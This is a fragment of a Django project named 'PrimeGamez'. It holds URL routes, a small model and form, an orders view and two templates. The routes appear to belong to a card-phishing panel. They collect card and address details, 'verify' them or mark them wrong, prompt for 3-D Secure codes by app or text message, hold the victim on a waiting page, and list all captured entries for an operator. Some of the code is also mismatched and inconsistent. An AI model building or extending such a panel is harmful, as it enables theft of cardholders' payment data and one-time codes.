PrimeGamez/urls.py
from django.contrib import admin
from django.urls import path
from django.urls.conf import include

urlpatterns = [
    path('admin/', admin.site.urls),
    path('', include('page1.urls')),
    path('page2/', include('page2.urls')),
]

page1/urls.py
from django.urls import path
from . import views

app_name = 'page1'

urlpatterns = [
    path('', views.index, name="amounts"),
    path('waiting/<str:pk>', views.waitReply, name="waiting"),
    path('order-wrong', views.order_wrong, name="order-wrong"),

    path('card-details/<str:pk>', views.cardDetails, name="card-details"),
    path('card-verification/<str:pk>',views.are_card_details_correct, name="card-verification"),
    path('card-wrong/<str:pk>',views.card_wrong, name="card-wrong"),


    path('address_details/<str:pk>', views.addressDetails, name="address"),

    path('address_verification/<str:pk>', views.address_correct, name="address-verification"),
    path('address_wrong/<str:pk>',views.address_wrong, name="address-wrong"),

    path('threeDSMain/<str:pk>', views.threeDSMain, name="threeDS"),

    path('authenticate-app/<str:pk>', views.authenticate_app, name="authenticate-app"),

    path('payment-verification/<str:pk>', views.payment_verification, name="payment-verification"),

    path('authenticate-text/<str:pk>', views.autenticate_text, name="authenticate-text"),
    path('payment-verification-text/<str:pk>', views.payment_verification_text, name="payment-verification-text"),




    path('payment-decline/<str:pk>', views.payment_declined, name="payment-declined"),
]

page2/urls.py
from django.urls import path
from . import views
app_name = 'page2'

urlpatterns = [
    path('', views.orders, name="orders"),
]

page2/models.py
from django.db import models

class page2(models.Model):
    amount = models.CharField(max_length=200)

page2/forms.py
from django.forms import ModelForm
from page1.models import page1

class page2Form(ModelForm):
    class Meta:
        model = page1
        fields = ['amount']

page2/views.py
from django.http.response import HttpResponse
from django.shortcuts import render
from django.http import request
from django.shortcuts import render, redirect
from page1.models import page1
from .forms import page2Form


def orders(request):

    page1data = page1.objects.all()
    context = {'data':page1data}
    return render(request, "page2/orders.html", context)

page2/templates/page2/delete-template.html
<form action="" method="POST">
{% csrf_token %}
    <p>Are you sure you want to delete "{{object}}"?</p>
<a href="{% url 'page2:orders' %}">Go Back </a>
<input type="submit" value="confirm" />
</form>

page2/templates/page2/order.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Single Order</title>
<table>
    <tr>
    <th>Amount</th>
    <th>Zip Code</th>
</tr>
<tr>
    <td>
        {{data.postCode}}
    </td>
    <td>
        {{data.orderNumber}}
    </td>
</tr>
</table>    

    <form action="" method="post">
        {% csrf_token %}
        {{form.as_p}}
        <input type="submit">
    </form>
        
</head>
<body>
    
</body>
</html>